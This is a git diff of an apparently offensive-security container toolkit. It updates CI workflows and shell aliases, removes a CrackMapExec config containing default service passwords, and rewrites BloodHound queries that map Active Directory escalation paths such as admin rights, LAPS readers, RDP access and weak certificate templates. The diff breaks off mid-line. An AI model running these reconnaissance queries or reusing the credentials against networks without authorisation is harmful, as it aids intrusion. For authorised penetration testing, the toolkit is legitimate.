diff --git a/.github/workflows/entrypoint_nightly.yml b/.github/workflows/entrypoint_nightly.yml index 6fdcaa628..1ed0912ac 100644 --- a/.github/workflows/entrypoint_nightly.yml +++ b/.github/workflows/entrypoint_nightly.yml @@ -163,7 +163,7 @@ jobs: image: [ "${{ needs.init.outputs.IMAGE_TAG }}" ] steps: - name: Login to Dockerhub - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/entrypoint_preprod_ad.yml b/.github/workflows/entrypoint_preprod_ad.yml index c2cee5cef..079dd0b01 100644 --- a/.github/workflows/entrypoint_preprod_ad.yml +++ b/.github/workflows/entrypoint_preprod_ad.yml @@ -123,7 +123,7 @@ jobs: steps: - name: Login to Dockerhub if: success() - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/entrypoint_preprod_base.yml b/.github/workflows/entrypoint_preprod_base.yml index 28e0121bc..c752ac137 100644 --- a/.github/workflows/entrypoint_preprod_base.yml +++ b/.github/workflows/entrypoint_preprod_base.yml @@ -131,7 +131,7 @@ jobs: steps: - name: Login to Dockerhub if: success() - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/entrypoint_preprod_full.yml b/.github/workflows/entrypoint_preprod_full.yml index 9e10ed9b3..b9c7dfed3 100644 --- a/.github/workflows/entrypoint_preprod_full.yml +++ b/.github/workflows/entrypoint_preprod_full.yml @@ -123,7 +123,7 @@ jobs: steps: - name: Login to Dockerhub if: success() - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/entrypoint_preprod_light.yml b/.github/workflows/entrypoint_preprod_light.yml index 3b3b85310..7a2fa5160 100644 --- a/.github/workflows/entrypoint_preprod_light.yml +++ b/.github/workflows/entrypoint_preprod_light.yml @@ -123,7 +123,7 @@ jobs: steps: - name: Login to Dockerhub if: success() - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/entrypoint_preprod_osint.yml b/.github/workflows/entrypoint_preprod_osint.yml index dfabbe932..fbaa4b52b 100644 --- a/.github/workflows/entrypoint_preprod_osint.yml +++ b/.github/workflows/entrypoint_preprod_osint.yml @@ -123,7 +123,7 @@ jobs: steps: - name: Login to Dockerhub if: success() - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/entrypoint_preprod_web.yml b/.github/workflows/entrypoint_preprod_web.yml index 54afc6aa2..838c46466 100644 --- a/.github/workflows/entrypoint_preprod_web.yml +++ b/.github/workflows/entrypoint_preprod_web.yml @@ -123,7 +123,7 @@ jobs: steps: - name: Login to Dockerhub if: success() - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/sub_build_belt.yml b/.github/workflows/sub_build_belt.yml index f9383cf7d..f55cbdb0a 100644 --- a/.github/workflows/sub_build_belt.yml +++ b/.github/workflows/sub_build_belt.yml @@ -142,7 +142,7 @@ jobs: timeout-minutes: 360 steps: - name: Login to Dockerhub - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/.github/workflows/sub_release_manifest.yml b/.github/workflows/sub_release_manifest.yml index 546cd513a..742e2ec56 100644 --- a/.github/workflows/sub_release_manifest.yml +++ b/.github/workflows/sub_release_manifest.yml @@ -24,7 +24,7 @@ jobs: runs-on: self-hosted steps: - name: Login to Dockerhub - uses: docker/login-action@v2 + uses: docker/login-action@v3 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} diff --git a/sources/assets/apt/preferences.d/default-stable b/sources/assets/apt/preferences.d/default-stable new file mode 100644 index 000000000..7eb62645c --- /dev/null +++ b/sources/assets/apt/preferences.d/default-stable @@ -0,0 +1,19 @@ +Package: * +Pin: release a=stable-security +Pin-Priority: 700 + +Package: * +Pin: release a=stable-updates +Pin-Priority: 700 + +Package: * +Pin: release a=stable +Pin-Priority: 700 + +Package: * +Pin: release a=testing +Pin-Priority: 650 + +Package: * +Pin: release a=unstable +Pin-Priority: 200 diff --git a/sources/assets/apt/sources.list.d/sid-debian.sources b/sources/assets/apt/sources.list.d/sid-debian.sources new file mode 100644 index 000000000..cd432e648 --- /dev/null +++ b/sources/assets/apt/sources.list.d/sid-debian.sources @@ -0,0 +1,5 @@ +Types: deb +URIs: http://deb.debian.org/debian +Suites: sid +Components: main non-free non-free-firmware contrib +Signed-By: /usr/share/keyrings/debian-archive-keyring.gpg \ No newline at end of file diff --git a/sources/assets/bloodhound/customqueries.json b/sources/assets/bloodhound/customqueries.json index d9f855cc0..59ed67e8e 100644 --- a/sources/assets/bloodhound/customqueries.json +++ b/sources/assets/bloodhound/customqueries.json @@ -33,19 +33,27 @@ }] }, { - "name": "Find objects containing names of some tier 0 software (SCCM, Veeam, ...)", + "name": "Find enabled objects containing names/descriptions of some tier 0 software (Azure, SCCM, Veeam, ...)", "category": "High Value Targets", "queryList": [{ "final": true, - "query": "MATCH (o) WHERE (o.samaccountname =~ '(?i).*(?:sccm|veeam|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*') RETURN o" + "query": "WITH '(?i).*(?:azure|sccm|mecm|veeam|acronis|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*' AS keyword MATCH (o {enabled: TRUE}) WHERE o.samaccountname =~ keyword OR o.description =~ keyword OR o.name =~ keyword RETURN o" }] }, { - "name": "(Warning: edits the DB) Mark objects containing names of some tier 0 software (SCCM, Veeam, ...) as HVT", + "name": "(Warning: edits the DB) Mark enabled objects containing names/descriptions of some tier 0 software (Azure, SCCM, Veeam, ...) as HVT", "category": "High Value Targets", "queryList": [{ "final": true, - "query": "MATCH (o) WHERE (o.samaccountname =~ '(?i).*(?:sccm|veeam|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*') SET o.highvalue=TRUE RETURN o" + "query": "WITH '(?i).*(?:azure|sccm|mecm|veeam|acronis|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*' AS keyword MATCH (o {enabled: TRUE}) WHERE o.samaccountname =~ keyword OR o.description =~ keyword OR o.name =~ keyword SET o.highvalue=TRUE RETURN o" + }] + }, + { + "name": "Find enabled computers containing SPNs with some tier 0 software (Azure, SCCM, Veeam, ...) as HVT", + "category": "High Value Targets", + "queryList": [{ + "final": true, + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE SIZE(c.serviceprincipalnames) > 0 UNWIND [s IN c.serviceprincipalnames WHERE s =~ '(?i).*(?:azure|sccm|mecm|veeam|acronis|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*'] AS spn WITH c, spn WHERE SIZE(spn) > 0 return c" }] }, { @@ -402,16 +410,24 @@ "category": "Admins", "queryList": [{ "final": true, - "query": "MATCH p=(c:Computer {enabled: TRUE})-[:HasSession]->(u:User {enabled: TRUE}) WITH c,u MATCH p=shortestPath((u)-[:AdminTo|MemberOf*1..]->(c)) RETURN p", + "query": "MATCH shortestPath((u:User {enabled: TRUE})-[:AdminTo|MemberOf*1..]->(c:Computer {enabled: TRUE})) MATCH p=(c)-[:HasSession]->(u) RETURN p", "allowCollapse": true }] }, { - "name": "Users with local admin rights", + "name": "Enabled users (not Domain/Enterprise Admins) with local admin rights", + "category": "Admins", + "queryList": [{ + "final": true, + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH p=shortestPath((u2:User {enabled: TRUE})-[:MemberOf|AdminTo*1..]->(c:Computer {enabled: TRUE})) WHERE NOT u2.objectid IN domainAdmins AND NOT u2.name STARTS WITH 'ANONYMOUS LOGON' AND NOT u2.name='' RETURN p" + }] + }, + { + "name": "Enabled users (not Domain/Enterprise Admins) with ReadLAPSPassword rights", "category": "Admins", "queryList": [{ "final": true, - "query": "MATCH p=(m:User {enabled: TRUE})-[:AdminTo]->(n:Computer {enabled: TRUE}) RETURN p" + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH shortestPath((u2:User {enabled: TRUE})-[:MemberOf|ReadLAPSPassword*1..]->(c:Computer {enabled: TRUE})) WHERE NOT u2.objectid IN domainAdmins AND NOT u2.name STARTS WITH 'ANONYMOUS LOGON' AND NOT u2.name='' RETURN u2" }] }, { @@ -439,7 +455,7 @@ }] }, { - "name": "Users with adminCount, not sensitive for delegation, not members of Protected Users", + "name": "Enabled users with adminCount, not sensitive for delegation, not members of Protected Users (3 hops)", "category": "Admins", "queryList": [{ "final": true, @@ -467,7 +483,7 @@ "category": "Groups", "queryList": [{ "final": true, - "query": "Match (n:Group) WHERE n.name CONTAINS 'ADMIN' RETURN n" + "query": "Match (g:Group) WHERE g.name CONTAINS 'ADMIN' RETURN g" }] }, { @@ -475,7 +491,7 @@ "category": "Groups", "queryList": [{ "final": true, - "query": "MATCH p=(m:Group)-[:ForceChangePassword]->(n:User) RETURN DISTINCT m[.]name, COUNT(m[.]name) ORDER BY COUNT(m[.]name) DESC" + "query": "MATCH p=(g:Group)-[:ForceChangePassword]->(u:User) RETURN DISTINCT g.name, COUNT(g.name) ORDER BY COUNT(g.name) DESC" }] }, { @@ -483,7 +499,7 @@ "category": "Groups", "queryList": [{ "final": true, - "query": "MATCH p=(n:User)-[:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p" + "query": "MATCH p=(u:User)-[:MemberOf*1..]->(g:Group {highvalue:TRUE}) RETURN p" }] }, { @@ -614,7 +630,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'XP' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS 'XP' RETURN c" }] }, { @@ -622,7 +638,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2000' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '2000' RETURN c" }] }, { @@ -630,7 +646,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2003' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '2003' RETURN c" }] }, { @@ -638,7 +654,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2008' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '2008' RETURN c" }] }, { @@ -646,7 +662,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'VISTA' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS 'VISTA' RETURN c" }] }, { @@ -654,7 +670,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '7' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '7' RETURN c" }] }, { @@ -662,7 +678,7 @@ "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", + "query": "MATCH (n:User {enabled: TRUE})<-[r:HasSession]-(m:Computer {enabled: TRUE}) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", "allowCollapse": true }] }, @@ -671,43 +687,43 @@ "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", + "query": "MATCH (n:User {enabled: TRUE})<-[r:HasSession]-(m:Computer {enabled: TRUE}) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(m)-[:HasSession]->(n) RETURN p", "allowCollapse": true }] }, { - "name": "Top Ten Users with Most Local Admin Rights", + "name": "Top Ten Users (not Domain Admins or Entreprise Admins) with most local admin rights", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(n)-[:AdminTo]->(m:Computer {enabled: TRUE}) RETURN p", "allowCollapse": true }] }, { - "name": "Top Ten Computers with Most Admins and their admins", + "name": "Top Ten Computers with most local admin rights (not Domain Admins or Entreprise Admins) and their admins", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(m)<-[:AdminTo]-(n:User {enabled: TRUE}) RETURN p", "allowCollapse": true }] }, { - "name": "Top Ten Computers with Most Admins", + "name": "Top Ten Computers with most admins (not Domain Admins or Entreprise Admins)", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN m", + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH (m)<-[:AdminTo]-(o:User {enabled: TRUE}) RETURN m", "allowCollapse": true }] }, { - "name": "(Warning: edits the DB) Mark Top Ten Computers with Most Admins as HVT", + "name": "(Warning: edits the DB) Mark Top Ten Computers with most admins (not Domain Admins or Entreprise Admins) as HVT", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) SET m.highvalue = true RETURN m", + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH (m)<-[:AdminTo]-(o:User {enabled: TRUE}) SET m.highvalue = true RETURN m", "allowCollapse": true }] }, @@ -734,7 +750,7 @@ "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid ENDS WITH '-513' RETURN p2 AS path" + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' RETURN p" }] }, { @@ -742,16 +758,16 @@ "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid ENDS WITH '-513' AND c2.operatingsystem =~ '(?i).*Server.*' RETURN p2 AS path", + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p", "allowCollapse": true }] }, { - "name": "Find enabled machines Authenticated Users can RDP to", + "name": "Find enabled computers Authenticated Users can RDP to", "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid =~ '(?i).*S-1-5-11$' RETURN p2 AS path", + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' RETURN p", "allowCollapse": true }] }, @@ -760,7 +776,7 @@ "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid =~ '(?i).*S-1-5-11$' AND c2.operatingsystem =~ '(?i).*Server.*' RETURN p2 AS path", + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p", "allowCollapse": true }] }, @@ -769,7 +785,7 @@ "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p" + "query": "MATCH p=(g:Group)-[:CanRDP]->(c:Computer) RETURN p" }] }, { @@ -785,7 +801,7 @@ "category": "Azure", "queryList": [{ "final": true, - "query": "MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p" + "query": "MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p" }] }, { @@ -993,7 +1009,7 @@ }] }, { - "name": "Find Unsecured Certificate Templates - Domain Escalation (ESC9)", + "name": "Find insecure Certificate Templates - Domain Escalation (ESC9)", "category": "AD CS Domain Escalation", "queryList": [ { @@ -1003,7 +1019,7 @@ ] }, { - "name": "Find Unsecured Certificate Templates - PKI (ESC9)", + "name": "Find insecure Certificate Templates - PKI (ESC9)", "category": "AD CS Domain Escalation", "queryList": [ { diff --git a/sources/assets/crackmapexec/cme.conf b/sources/assets/crackmapexec/cme.conf deleted file mode 100644 index 521d420c9..000000000 --- a/sources/assets/crackmapexec/cme.conf +++ /dev/null @@ -1,25 +0,0 @@ -[CME] -workspace = default -last_used_db = smb -pwn3d_label = admin -audit_mode = -log_mode = False -ignore_opsec = True - -[BloodHound] -bh_enabled = False -bh_uri = 127.0.0.1 -bh_port = 7687 -bh_user = neo4j -bh_pass = exegol4thewin - -[Empire] -api_host = 127.0.0.1 -api_port = 1337 -username = empireadmin -password = exegol4thewin - -[Metasploit] -rpc_host = 127.0.0.1 -rpc_port = 55552 -password = abc123 diff --git a/sources/assets/desktop/bin/desktop-start b/sources/assets/desktop/bin/desktop-start index e0e7f99c3..866a7d59e 100644 --- a/sources/assets/desktop/bin/desktop-start +++ b/sources/assets/desktop/bin/desktop-start @@ -10,7 +10,7 @@ find_available_display() { readarray -t x11_sockets < <(ss -x | grep X11| cut -d 'X' -f3 | cut -d ' ' -f 1 | sort -u) fi - local max_num=0 + local max_num=1 # Find the maximum number for num in "${x11_sockets[@]}"; do @@ -19,8 +19,8 @@ find_available_display() { fi done - # Search number from 1 to max_num+1 to find the first available DISPLAY id - for (( i = 1; i <= max_num + 1; i++ )); do + # Search number from 2 to max_num+1 to find the first available DISPLAY id (DISPLAY :1 cannot be used in some setup, starting from 2) + for (( i = 2; i <= max_num + 1; i++ )); do found=0 for num in "${x11_sockets[@]}"; do if (( num == i )); then @@ -42,6 +42,12 @@ host=${EXEGOL_DESKTOP_HOST:-"$HOSTNAME"} port=${EXEGOL_DESKTOP_PORT:-"6336"} username=${EXEGOL_USERNAME:-"root"} +# Clear X11 env from host sharing (if any) +unset XDG_RUNTIME_DIR +unset XDG_SESSION_TYPE +unset DISPLAY +unset WAYLAND_DISPLAY + echo "Starting Exegol desktop with $mode" display_id=$(find_available_display) @@ -67,7 +73,7 @@ case "$mode" in http) random_port=$(python3 -c 'import socket; s=socket.socket(); s.bind(("", 0)); print(s.getsockname()[1]); s.close()') vncserver -localhost "yes" -rfbport "$random_port" -geometry "1920x1080" -SecurityTypes "Plain" -PAMService "tigervnc" -PlainUsers "$username" ":$display_id" && \ - websockify -D --web /usr/share/novnc/ "$host:$port" "localhost:$random_port" + websockify -D --web /usr/share/novnc/ "$host:$port" "127.0.0.1:$random_port" ;; esac diff --git a/sources/assets/exegol/load_supported_setups.sh b/sources/assets/exegol/load_supported_setups.sh index f007cac1f..ef2ad680c 100755 --- a/sources/assets/exegol/load_supported_setups.sh +++ b/sources/assets/exegol/load_supported_setups.sh @@ -275,6 +275,14 @@ function _trust_ca_cert_in_firefox() { certutil -A -n "$2" -t "TC" -i "$1" -d ~/.mozilla/firefox/*.Exegol } +function deploy_arsenal_cheatsheet () { +# Function to add custom cheatsheets into arsenal + colorecho "Deploying custom arsenal cheatsheet" + if [[ ! -d "$MY_SETUP_PATH/arsenal-cheats" ]]; then + mkdir -p "$MY_SETUP_PATH/arsenal-cheats" + fi +} + # Starting # This procedure is supposed to be executed only once at the first startup, using a lockfile check @@ -292,6 +300,7 @@ deploy_python3 deploy_firefox_addons deploy_bloodhound trust_ca_certs_in_firefox +deploy_arsenal_cheatsheet run_user_setup diff --git a/sources/assets/grc/conf.cme b/sources/assets/grc/conf.cme deleted file mode 100644 index 47576d235..000000000 --- a/sources/assets/grc/conf.cme +++ /dev/null @@ -1,16 +0,0 @@ -# Signing True -regexp=signing\:True -colours=bold green -======= -# Signing False -regexp=signing\:False -colours=bold red -======= -# SMB1 True -regexp=SMBv1\:True -colours=yellow -======= -# SMBv1 False -regexp=SMBv1\:False -colours=blue -======= \ No newline at end of file diff --git a/sources/assets/grc/grc.conf b/sources/assets/grc/grc.conf index 1f6d52dd6..8156df4cf 100644 --- a/sources/assets/grc/grc.conf +++ b/sources/assets/grc/grc.conf @@ -1,7 +1,3 @@ -# cme -(^|[/\w\.]+/)g?crackmapexec\s? -conf.cme - # rbcd (^|[/\w\.]+/)g?rbcd.py\s? conf.rbcd diff --git a/sources/assets/shells/aliases.d/adminer b/sources/assets/shells/aliases.d/adminer new file mode 100644 index 000000000..ba5f13447 --- /dev/null +++ b/sources/assets/shells/aliases.d/adminer @@ -0,0 +1 @@ +alias adminer=AD-miner \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/crackmapexec b/sources/assets/shells/aliases.d/crackmapexec deleted file mode 100644 index 824111b7c..000000000 --- a/sources/assets/shells/aliases.d/crackmapexec +++ /dev/null @@ -1,2 +0,0 @@ -alias cme-neo4j-enable='sed -i "s/bh_enabled = False/bh_enabled = True/" ~/.cme/cme.conf' -alias cme-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.cme/cme.conf' \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/metasploit b/sources/assets/shells/aliases.d/metasploit index 78ea8c1b0..591bc8fc4 100644 --- a/sources/assets/shells/aliases.d/metasploit +++ b/sources/assets/shells/aliases.d/metasploit @@ -1,10 +1,10 @@ -alias msfconsole='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfconsole' -alias msfd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfd' +alias msfconsole='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfconsole' +alias msfd='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfd' +alias msfrpc='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfrpc' +alias msfrpcd='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfrpcd' +alias msfupdate='cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfupdate; cd -' +alias msfvenom='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfvenom' msfdb_func() { - sudo -u postgres sh -c "cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb $@" + sudo -u postgres sh -c "BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb $@" } -alias msfdb='msfdb_func' -alias msfrpc='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpc' -alias msfrpcd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpcd' -alias msfupdate='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfupdate' -alias msfvenom='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfvenom' +alias msfdb='msfdb_func' \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/netexec b/sources/assets/shells/aliases.d/netexec index a06f77142..c2038f304 100644 --- a/sources/assets/shells/aliases.d/netexec +++ b/sources/assets/shells/aliases.d/netexec @@ -1,2 +1,4 @@ alias 